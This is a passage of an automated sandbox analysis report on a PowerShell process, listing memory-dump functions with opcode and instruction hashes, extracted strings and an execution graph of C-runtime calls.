                                                              • Opcode Fuzzy Hash: 7c203833af096bf119b7452499d556e3115613da2fd4008ce027e7536538886c
                                                              • Instruction Fuzzy Hash: 65F0673092230EDFDF54EFE4C849AAEBF75EB48305F200028E806AB294CB706841CB10
                                                              Function 08284A1B Relevance: .0, Instructions: 30COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2205257136.0000000008280000.00000040.00000800.00020000.00000000.sdmp, Offset: 08280000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_8280000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 7ab16e361468ffeb7114e0091622d9c3431ef68882059db450589b8f9ff7d5d8
                                                              • Instruction ID: 3fb0b3f3c78e52bc7bf174757f997696a987d32afc23deee443f65ec5f33b0da
                                                              • Opcode Fuzzy Hash: 7ab16e361468ffeb7114e0091622d9c3431ef68882059db450589b8f9ff7d5d8
                                                              • Instruction Fuzzy Hash: F0F0493092230EDFDF54EBE4C909AADBBB5AB44305F200018E506AB294CB705911DB10
                                                              Function 074733A4 Relevance: .0, Instructions: 27COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2203594251.0000000007470000.00000040.00000800.00020000.00000000.sdmp, Offset: 07470000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7470000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: bcedf359c7073f8e16311f1266a667dd3bf23f46739c85a9366c3c8c6c61dd59
                                                              • Instruction ID: 3235904a40d30b238d73025e81f217efe5e703bf7c9aba3a931a8ff717611301
                                                              • Opcode Fuzzy Hash: bcedf359c7073f8e16311f1266a667dd3bf23f46739c85a9366c3c8c6c61dd59
                                                              • Instruction Fuzzy Hash: 43F0F870219281AFD322CB14C855996BB71AB86315B19C187D045CF2A7C776E846D751
                                                              Function 08284C2B Relevance: .0, Instructions: 25COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2205257136.0000000008280000.00000040.00000800.00020000.00000000.sdmp, Offset: 08280000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_8280000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: f551a6ac4642f9584c5660a3435501a107c260a2f20cee57b134436548ce2f30
                                                              • Instruction ID: edc3e51daa5bf7b3c13b2406615e2b71bd1c50b8c96c995e9ce13789670e9ce6
                                                              • Opcode Fuzzy Hash: f551a6ac4642f9584c5660a3435501a107c260a2f20cee57b134436548ce2f30
                                                              • Instruction Fuzzy Hash: 2DF0A03062221EDFDF14FBD0C905AAE7B74EB04305F204404E902AA294CB746E0ACB55
                                                              Function 08284D45 Relevance: .0, Instructions: 25COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2205257136.0000000008280000.00000040.00000800.00020000.00000000.sdmp, Offset: 08280000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_8280000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 776f0b63f110b56b21e402f7dcbc1afb24677ec63180b62b4762a0f9796674c1
                                                              • Instruction ID: f0d4c28c85415b5ef0dce37f5dad99f1fccd038553da32a315a979278c5b4baa
                                                              • Opcode Fuzzy Hash: 776f0b63f110b56b21e402f7dcbc1afb24677ec63180b62b4762a0f9796674c1
                                                              • Instruction Fuzzy Hash: 5CF0A03062220EDFDF14FFD0C905AAE7B74EB04309F204448F802AB284CB746E06CB45
                                                              Function 08284D1D Relevance: .0, Instructions: 22COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2205257136.0000000008280000.00000040.00000800.00020000.00000000.sdmp, Offset: 08280000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_8280000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 90d45b1a3e6bbc6be8e0879ee5bd575fde1f13cd2e3fbe33b6066c92c1363c32
                                                              • Instruction ID: 79ba7f4fd332000d3f3252af2a9f82ac4f9d91382a8da591a70230719e7b034c
                                                              • Opcode Fuzzy Hash: 90d45b1a3e6bbc6be8e0879ee5bd575fde1f13cd2e3fbe33b6066c92c1363c32
                                                              • Instruction Fuzzy Hash: C3E09A7062220FDBDF14BFE0C905AAEBB74EB1030AF200858E802AB684CBB069159F51
                                                              Function 08284CB3 Relevance: .0, Instructions: 21COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2205257136.0000000008280000.00000040.00000800.00020000.00000000.sdmp, Offset: 08280000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_8280000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 21b6f695dd7032b5660f6c2721397298f83b7a10edb81c81785a820739282248
                                                              • Instruction ID: 598317585bab16d6d2a096e90352c0f17bf6c4dabc32aa5fa2dd273b9354c028
                                                              • Opcode Fuzzy Hash: 21b6f695dd7032b5660f6c2721397298f83b7a10edb81c81785a820739282248
                                                              • Instruction Fuzzy Hash: 96E09A7062220FDBDF14BFE0C905AAE7B34EB00309F200848E802AB684CBB069159B11
                                                              Function 08284C8D Relevance: .0, Instructions: 21COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2205257136.0000000008280000.00000040.00000800.00020000.00000000.sdmp, Offset: 08280000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_8280000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 21b6f695dd7032b5660f6c2721397298f83b7a10edb81c81785a820739282248
                                                              • Instruction ID: 598317585bab16d6d2a096e90352c0f17bf6c4dabc32aa5fa2dd273b9354c028
                                                              • Opcode Fuzzy Hash: 21b6f695dd7032b5660f6c2721397298f83b7a10edb81c81785a820739282248
                                                              • Instruction Fuzzy Hash: 96E09A7062220FDBDF14BFE0C905AAE7B34EB00309F200848E802AB684CBB069159B11
                                                              Function 082849CC Relevance: .0, Instructions: 13COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2205257136.0000000008280000.00000040.00000800.00020000.00000000.sdmp, Offset: 08280000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_8280000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: deec8ed52b6dcd0ac622c3fd5bbbb0b19d347b1520f2039c86f88b7e03a91a9d
                                                              • Instruction ID: 3c819aaa3a82d25de78b99af8c6597ce2bff3e93b7b7805854d300095e4a9a26
                                                              • Opcode Fuzzy Hash: deec8ed52b6dcd0ac622c3fd5bbbb0b19d347b1520f2039c86f88b7e03a91a9d
                                                              • Instruction Fuzzy Hash: 15D05E3052220FDBDF14FA80C6107BE76606B1020DF200449C801B5580D7B066058A56

                                                              Non-executed Functions

                                                              Function 045DD6E0 Relevance: .1, Instructions: 75COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2197084723.00000000045DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 045DD000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_45dd000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: b81de558d1abea40ff72a6fbf003bfdaaf6e16386463d33256dc8fe3065e2075
                                                              • Instruction ID: aca24b0448703c6fb21b45dd3c82a93f27e7280495752eb552e0297443cbc945
                                                              • Opcode Fuzzy Hash: b81de558d1abea40ff72a6fbf003bfdaaf6e16386463d33256dc8fe3065e2075
                                                              • Instruction Fuzzy Hash: AA21D676604200DFDB25DF18D9C4B26BF75FF94320F24C5A9D9090B246C336E45AEBA1
                                                              Function 07478B20 Relevance: 15.3, Strings: 12, Instructions: 342COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2203594251.0000000007470000.00000040.00000800.00020000.00000000.sdmp, Offset: 07470000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7470000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 4'dq$4'dq$4'dq$tPdq$tPdq$#tk$$dq$$dq$$dq$$tk$zl$zl
                                                              • API String ID: 0-3982629686
                                                              • Opcode ID: 0bdebc446d80e425d1cdf3209d301bed01bcc00301bb31116b5306a2388b68b0
                                                              • Instruction ID: dfe516ee200bcf6868f7202127b948bea1bbd80a209a46de5e8756ed489c0a61
                                                              • Opcode Fuzzy Hash: 0bdebc446d80e425d1cdf3209d301bed01bcc00301bb31116b5306a2388b68b0
                                                              • Instruction Fuzzy Hash: 7DB113F1B043168FDB258E6884093FBBBAAAFD1311F14886BD905CB791DB31D946C7A1
                                                              Function 07479610 Relevance: 14.2, Strings: 11, Instructions: 495COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2203594251.0000000007470000.00000040.00000800.00020000.00000000.sdmp, Offset: 07470000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7470000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 4'dq$4'dq$tPdq$tPdq$$dq$$dq$$dq$zl$zl$zl$zl
                                                              • API String ID: 0-1203021120
                                                              • Opcode ID: 5e14d47be1f2669be0efb85b91a9bdd20a86d8dbd9f6e004c2b942263931b4b2
                                                              • Instruction ID: cb9072b05da56ab63bf45ed6745c9497d18403574263fd1dfdd30e243226166c
                                                              • Opcode Fuzzy Hash: 5e14d47be1f2669be0efb85b91a9bdd20a86d8dbd9f6e004c2b942263931b4b2
                                                              • Instruction Fuzzy Hash: D8F136B17042168FCB259E6884016EBBBE6EFC6321F14C47BD949CB391DB31E946C7A1
                                                              Function 0747BD58 Relevance: 14.1, Strings: 11, Instructions: 367COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2203594251.0000000007470000.00000040.00000800.00020000.00000000.sdmp, Offset: 07470000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7470000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 4'dq$4'dq$4'dq$4'dq$$dq$$dq$$dq$$dq$$dq$$dq$$dq
                                                              • API String ID: 0-1727510186
                                                              • Opcode ID: 2cbd1b03534f2b930dfd67dac8cf4cab95ff1fb71aebeede0039f2135a5ea02c
                                                              • Instruction ID: 9af07895074e144d0c1ad9faf1e78019e600098fa61772a451e9126971a1c994
                                                              • Opcode Fuzzy Hash: 2cbd1b03534f2b930dfd67dac8cf4cab95ff1fb71aebeede0039f2135a5ea02c
                                                              • Instruction Fuzzy Hash: 02C1D4F170425ADFCB258F68D4446EB77A6EF85312F24C46BD8198B391CB31C982CBA1
                                                              Function 074726A0 Relevance: 12.8, Strings: 10, Instructions: 306COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2203594251.0000000007470000.00000040.00000800.00020000.00000000.sdmp, Offset: 07470000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7470000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 4'dq$4'dq$4'dq$4'dq$$dq$$dq$$dq$$dq$$dq$$dq
                                                              • API String ID: 0-4287419856
                                                              • Opcode ID: 3f5bbeea1de7dc6abb5b276f909e2a4721b720cccaa77831bfd2dc1569a85ca8
                                                              • Instruction ID: 79360a0cb2ab691678ff4cf18a3ca046a6fd0fcd73531d4667f248bed0ee5f42
                                                              • Opcode Fuzzy Hash: 3f5bbeea1de7dc6abb5b276f909e2a4721b720cccaa77831bfd2dc1569a85ca8
                                                              • Instruction Fuzzy Hash: 82A108F17043169FCB258A6998503EB7BF1BF86211F28886BD845CB391DBB1C986C791
                                                              Function 0747D210 Relevance: 8.9, Strings: 7, Instructions: 196COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2203594251.0000000007470000.00000040.00000800.00020000.00000000.sdmp, Offset: 07470000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7470000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 4'dq$tPdq$tPdq$$dq$(jq$(jq$(jq
                                                              • API String ID: 0-1272430879
                                                              • Opcode ID: 81ed8e863ee43b7fb57c17d639ce60922eabceb492de29a76a8ddafe16be1f58
                                                              • Instruction ID: b83feaa4173289eed59d02c6d9ee0c83d49e3dd2bdf003fd8bd6be9491308423
                                                              • Opcode Fuzzy Hash: 81ed8e863ee43b7fb57c17d639ce60922eabceb492de29a76a8ddafe16be1f58
                                                              • Instruction Fuzzy Hash: D16191B0F202159BCB24CE54C545BEBB7E6AF85314F59849BE8056B395C731EC81CFA1
                                                              Function 0747CEAC Relevance: 8.9, Strings: 7, Instructions: 161COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2203594251.0000000007470000.00000040.00000800.00020000.00000000.sdmp, Offset: 07470000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7470000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 4'dq$TQiq$TQiq$tPdq$$dq$$dq$$dq
                                                              • API String ID: 0-2592043700
                                                              • Opcode ID: 4f9b922c487ef684778e7fa6f9551af706130de0580fcd8645f01745f083eefc
                                                              • Instruction ID: bd63cddfd21eeaff43d7e70567bd8bbfb7a2b0884ea563178824591340a7df53
                                                              • Opcode Fuzzy Hash: 4f9b922c487ef684778e7fa6f9551af706130de0580fcd8645f01745f083eefc
                                                              • Instruction Fuzzy Hash: 4351B1B0B20206EFCB24CE14C5547E777A6EF45316F5884ABE8059B3D1C736D986CBA1
                                                              Function 0747C978 Relevance: 7.7, Strings: 6, Instructions: 166COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2203594251.0000000007470000.00000040.00000800.00020000.00000000.sdmp, Offset: 07470000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7470000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 4'dq$d%jq$d%jq$d%jq$tPdq$$dq
                                                              • API String ID: 0-3868062301
                                                              • Opcode ID: 5a29fd0ced16c8a6cef07a87f250ea066115db164b7eb9feb265a29fe082aeb9
                                                              • Instruction ID: 4caa59617b1539197add53ac39faf227de6219484428a7409e5dbb49c7ba13a4
                                                              • Opcode Fuzzy Hash: 5a29fd0ced16c8a6cef07a87f250ea066115db164b7eb9feb265a29fe082aeb9
                                                              • Instruction Fuzzy Hash: FE51BFB0A002059FCB24CF14C5C07EBBBEAEB86651F59889BE8059B391D731DD41CBB1
                                                              Function 074700F0 Relevance: 6.6, Strings: 5, Instructions: 315COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2203594251.0000000007470000.00000040.00000800.00020000.00000000.sdmp, Offset: 07470000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7470000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 4'dq$4'dq$<Ttk$tPdq$tPdq
                                                              • API String ID: 0-1443820039
                                                              • Opcode ID: 99e62a2b9e854a78ca042fe0133a3324363da1268a49479285998925c649994f
                                                              • Instruction ID: c681caebe9287973e111a623ac48eb35a19590e5444b97cec8993f77f6bc5e90
                                                              • Opcode Fuzzy Hash: 99e62a2b9e854a78ca042fe0133a3324363da1268a49479285998925c649994f
                                                              • Instruction Fuzzy Hash: E9A125B17063159FCB258B6889147EBBBE2AF86311F14C4ABD949CB3A1DB31DC85C391
                                                              Function 0747D8C8 Relevance: 6.4, Strings: 5, Instructions: 185COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2203594251.0000000007470000.00000040.00000800.00020000.00000000.sdmp, Offset: 07470000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7470000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 4'dq$tPdq$$dq$$dq$$dq
                                                              • API String ID: 0-3100050110
                                                              • Opcode ID: 3cf5b84109b9cd73204ea72a6c0115fad6786e774fc29ad6d16f42256aeaa100
                                                              • Instruction ID: 1c75897e381da90f0bd74e051d54cbd588d3cf869707834ee3bfac10ba53583b
                                                              • Opcode Fuzzy Hash: 3cf5b84109b9cd73204ea72a6c0115fad6786e774fc29ad6d16f42256aeaa100
                                                              • Instruction Fuzzy Hash: 93614CF0B2420AEFDB248E14CA457FB77A6AF86211F188857E8055B394C771ED81CFA1
                                                              Function 07471CB8 Relevance: 6.4, Strings: 5, Instructions: 121COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2203594251.0000000007470000.00000040.00000800.00020000.00000000.sdmp, Offset: 07470000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7470000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 4'dq$tPdq$$dq$$dq$$dq
                                                              • API String ID: 0-3100050110
                                                              • Opcode ID: a2151a0491230b6ce205cbb648e6f8cabf7f513c00299b2f6d4e925d50cf4b6d
                                                              • Instruction ID: e3221d5aa2dbeeee8d695ddde9bf0fcdfaf1bbf6559c653ca5536f631826a949
                                                              • Opcode Fuzzy Hash: a2151a0491230b6ce205cbb648e6f8cabf7f513c00299b2f6d4e925d50cf4b6d
                                                              • Instruction Fuzzy Hash: C541E2B0A04209EFDB248E54C5807E7BBB6AFC6310F18C4ABD8259B291C731E946CF91
                                                              Function 0747CABE Relevance: 6.3, Strings: 5, Instructions: 85COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2203594251.0000000007470000.00000040.00000800.00020000.00000000.sdmp, Offset: 07470000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7470000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 4'dq$d%jq$d%jq$d%jq$tPdq
                                                              • API String ID: 0-2394669807
                                                              • Opcode ID: 40a91df6d04a9ce4ac16190c7310b21af4846a4b5e6c3985f1865d190039cb4f
                                                              • Instruction ID: f3563451e546a03c6401fba8c9a07b0fa15891b5eb661746dc47357f49d999d4
                                                              • Opcode Fuzzy Hash: 40a91df6d04a9ce4ac16190c7310b21af4846a4b5e6c3985f1865d190039cb4f
                                                              • Instruction Fuzzy Hash: B13181B4B002159FCB24DF64D590AEBBBEABB48710F15855AED05AB340C731ED41CBE0
                                                              Function 07472868 Relevance: 6.3, Strings: 5, Instructions: 79COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2203594251.0000000007470000.00000040.00000800.00020000.00000000.sdmp, Offset: 07470000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7470000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 4'dq$$dq$$dq$$dq$$dq
                                                              • API String ID: 0-206161847
                                                              • Opcode ID: 327162c6af310fe4619f334da36d97eb968e82f69bd3b49db16e5b68948ac801
                                                              • Instruction ID: 1da0b4c7253c0e370364a1e590f0043a0c64c970c8345b439e0196d71fbba5ad
                                                              • Opcode Fuzzy Hash: 327162c6af310fe4619f334da36d97eb968e82f69bd3b49db16e5b68948ac801
                                                              • Instruction Fuzzy Hash: 37218BF1710216DBDF348E05C5407F7B7B5BF82661F2D856BE8049B251CBB2CA85CA51
                                                              Function 074704A8 Relevance: 6.3, Strings: 5, Instructions: 71COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2203594251.0000000007470000.00000040.00000800.00020000.00000000.sdmp, Offset: 07470000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7470000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: $dq$$dq$$dq$zl$zl
                                                              • API String ID: 0-1227720266
                                                              • Opcode ID: 5ef032af3565d5c9caf38f55e7a596603f071de3201cfaddf7866f28576f89a5
                                                              • Instruction ID: eacc674132398d9c380e1fa6c9660193c4136e39ee6aa5a1f6218f90304d97b1
                                                              • Opcode Fuzzy Hash: 5ef032af3565d5c9caf38f55e7a596603f071de3201cfaddf7866f28576f89a5
                                                              • Instruction Fuzzy Hash: 3011E6B234231A9BDB349A6AD8017F7B7A6BBC5325F74C42BE849863A0CA71D442C350
                                                              Function 0747DC90 Relevance: 5.1, Strings: 4, Instructions: 115COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2203594251.0000000007470000.00000040.00000800.00020000.00000000.sdmp, Offset: 07470000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7470000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: XRiq$XRiq$tPdq$$dq
                                                              • API String ID: 0-3891573685
                                                              • Opcode ID: f55fa574254165508fac180ab56584ab48c12632aee73ad6c6a24e7458401a40
                                                              • Instruction ID: 816d9b0fb07ec03de7b391073a408a6def9ba00180fea653b002677f6ff6a64e
                                                              • Opcode Fuzzy Hash: f55fa574254165508fac180ab56584ab48c12632aee73ad6c6a24e7458401a40
                                                              • Instruction Fuzzy Hash: DC415EB0F20205DFCB298E45C544AEAB7E2AF89710F29C49AE8156B355C772ED41CFA0
                                                              Function 07471070 Relevance: 5.1, Strings: 4, Instructions: 94COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2203594251.0000000007470000.00000040.00000800.00020000.00000000.sdmp, Offset: 07470000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7470000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: $dq$$dq$$dq$$dq
                                                              • API String ID: 0-185584874
                                                              • Opcode ID: a722ec072f2fd76d8d5abcbbb33e2982918441e222cd1a95ece589537601b121
                                                              • Instruction ID: 26ae74ffdbad597ea797c6971ce716da411ae50b96a942896c7cc435f24ed2d6
                                                              • Opcode Fuzzy Hash: a722ec072f2fd76d8d5abcbbb33e2982918441e222cd1a95ece589537601b121
                                                              • Instruction Fuzzy Hash: 0321F6B131035E9BDB34597A89017F7A6EADBC5712F74882BE909CB781CD75C842C361
                                                              Function 07471B58 Relevance: 5.1, Strings: 4, Instructions: 51COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2203594251.0000000007470000.00000040.00000800.00020000.00000000.sdmp, Offset: 07470000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7470000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 4'dq$4'dq$$dq$$dq
                                                              • API String ID: 0-4229963660
                                                              • Opcode ID: 4641aaf787bd5374e93702081c8dee5224707a5be6a84bb27586141fcad137f9
                                                              • Instruction ID: 53db5af4935e8ce1ed9406d6cc4adf89dd071ebd97397359a22cd04dacadfcb9
                                                              • Opcode Fuzzy Hash: 4641aaf787bd5374e93702081c8dee5224707a5be6a84bb27586141fcad137f9
                                                              • Instruction Fuzzy Hash: 2901BC6170939A5FC73B0A7818206F66FB29FC360136984DBC880CB792CA148D4AC3A3

                                                              Execution Graph

                                                              Execution Coverage:2%
                                                              Dynamic/Decrypted Code Coverage:100%
                                                              Signature Coverage:2%
                                                              Total number of Nodes:1645
                                                              Total number of Limit Nodes:1
                                                              execution_graph 5915 23d74ed7 5926 23d76d60 5915->5926 5920 23d74ef4 5922 23d7571e _free 20 API calls 5920->5922 5923 23d74f29 5922->5923 5924 23d74eff 5925 23d7571e _free 20 API calls 5924->5925 5925->5920 5927 23d74ee9 5926->5927 5928 23d76d69 5926->5928 5930 23d77153 GetEnvironmentStringsW 5927->5930 5959 23d76c5f 5928->5959 5931 23d7716a 5930->5931 5941 23d771bd 5930->5941 5934 23d77170 WideCharToMultiByte 5931->5934 5932 23d771c6 FreeEnvironmentStringsW 5933 23d74eee 5932->5933 5933->5920 5942 23d74f2f 5933->5942 5935 23d7718c 5934->5935 5934->5941 5936 23d756d0 21 API calls 5935->5936 5937 23d77192 5936->5937 5938 23d771af 5937->5938 5939 23d77199 WideCharToMultiByte 5937->5939 5940 23d7571e _free 20 API calls 5938->5940 5939->5938 5940->5941 5941->5932 5941->5933 5943 23d74f44 5942->5943 5944 23d7637b __dosmaperr 20 API calls 5943->5944 5955 23d74f6b 5944->5955 5945 23d74fcf 5946 23d7571e _free 20 API calls 5945->5946 5947 23d74fe9 5946->5947 5947->5924 5948 23d7637b __dosmaperr 20 API calls 5948->5955 5949 23d74fd1 6478 23d75000 5949->6478 5953 23d7571e _free 20 API calls 5953->5945 5954 23d74ff3 5956 23d762bc ___std_exception_copy 11 API calls 5954->5956 5955->5945 5955->5948 5955->5949 5955->5954 5957 23d7571e _free 20 API calls 5955->5957 6469 23d7544d 5955->6469 5958 23d74fff 5956->5958 5957->5955 5979 23d75af6 GetLastError 5959->5979 5961 23d76c6c 5999 23d76d7e 5961->5999 5963 23d76c74 6008 23d769f3 5963->6008 5966 23d76c8b 5966->5927 5969 23d76cce 5971 23d7571e _free 20 API calls 5969->5971 5971->5966 5973 23d76cc9 5974 23d76368 _free 20 API calls 5973->5974 5974->5969 5975 23d76d12 5975->5969 6032 23d768c9 5975->6032 5976 23d76ce6 5976->5975 5977 23d7571e _free 20 API calls 5976->5977 5977->5975 5980 23d75b0c 5979->5980 5981 23d75b12 5979->5981 5982 23d75e08 __dosmaperr 11 API calls 5980->5982 5983 23d7637b __dosmaperr 20 API calls 5981->5983 5985 23d75b61 SetLastError 5981->5985 5982->5981 5984 23d75b24 5983->5984 5986 23d75b2c 5984->5986 5987 23d75e5e __dosmaperr 11 API calls 5984->5987 5985->5961 5988 23d7571e _free 20 API calls 5986->5988 5989 23d75b41 5987->5989 5991 23d75b32 5988->5991 5989->5986 5990 23d75b48 5989->5990 5992 23d7593c __dosmaperr 20 API calls 5990->5992 5993 23d75b6d SetLastError 5991->5993 5994 23d75b53 5992->5994 6035 23d755a8 5993->6035 5996 23d7571e _free 20 API calls 5994->5996 5998 23d75b5a 5996->5998 5998->5985 5998->5993 6000 23d76d8a ___scrt_is_nonwritable_in_current_image 5999->6000 6001 23d75af6 _abort 38 API calls 6000->6001 6006 23d76d94 6001->6006 6003 23d76e18 _abort 6003->5963 6005 23d755a8 _abort 38 API calls 6005->6006 6006->6003 6006->6005 6007 23d7571e _free 20 API calls 6006->6007 6208 23d75671 RtlEnterCriticalSection 6006->6208 6209 23d76e0f 6006->6209 6007->6006 6213 23d754a7 6008->6213 6011 23d76a26 6013 23d76a2b GetACP 6011->6013 6014 23d76a3d 6011->6014 6012 23d76a14 GetOEMCP 6012->6014 6013->6014 6014->5966 6015 23d756d0 6014->6015 6016 23d7570e 6015->6016 6020 23d756de __dosmaperr 6015->6020 6017 23d76368 _free 20 API calls 6016->6017 6019 23d7570c 6017->6019 6018 23d756f9 RtlAllocateHeap 6018->6019 6018->6020 6019->5969 6022 23d76e20 6019->6022 6020->6016 6020->6018 6021 23d7474f __dosmaperr 7 API calls 6020->6021 6021->6020 6023 23d769f3 40 API calls 6022->6023 6024 23d76e3f 6023->6024 6027 23d76e90 IsValidCodePage 6024->6027 6029 23d76e46 6024->6029 6031 23d76eb5 ___scrt_fastfail 6024->6031 6025 23d72ada _ValidateLocalCookies 5 API calls 6026 23d76cc1 6025->6026 6026->5973 6026->5976 6028 23d76ea2 GetCPInfo 6027->6028 6027->6029 6028->6029 6028->6031 6029->6025 6360 23d76acb GetCPInfo 6031->6360 6433 23d76886 6032->6433 6034 23d768ed 6034->5969 6046 23d77613 6035->6046 6038 23d755b8 6039 23d755c2 IsProcessorFeaturePresent 6038->6039 6045 23d755e0 6038->6045 6041 23d755cd 6039->6041 6076 23d760e2 6041->6076 6082 23d74bc1 6045->6082 6085 23d77581 6046->6085 6049 23d7766e 6050 23d7767a _abort 6049->6050 6051 23d776a1 _abort 6050->6051 6052 23d75b7a __dosmaperr 20 API calls 6050->6052 6057 23d776a7 _abort 6050->6057 6053 23d776f3 6051->6053 6051->6057 6075 23d776d6 6051->6075 6052->6051 6054 23d76368 _free 20 API calls 6053->6054 6055 23d776f8 6054->6055 6099 23d762ac 6055->6099 6061 23d7771f 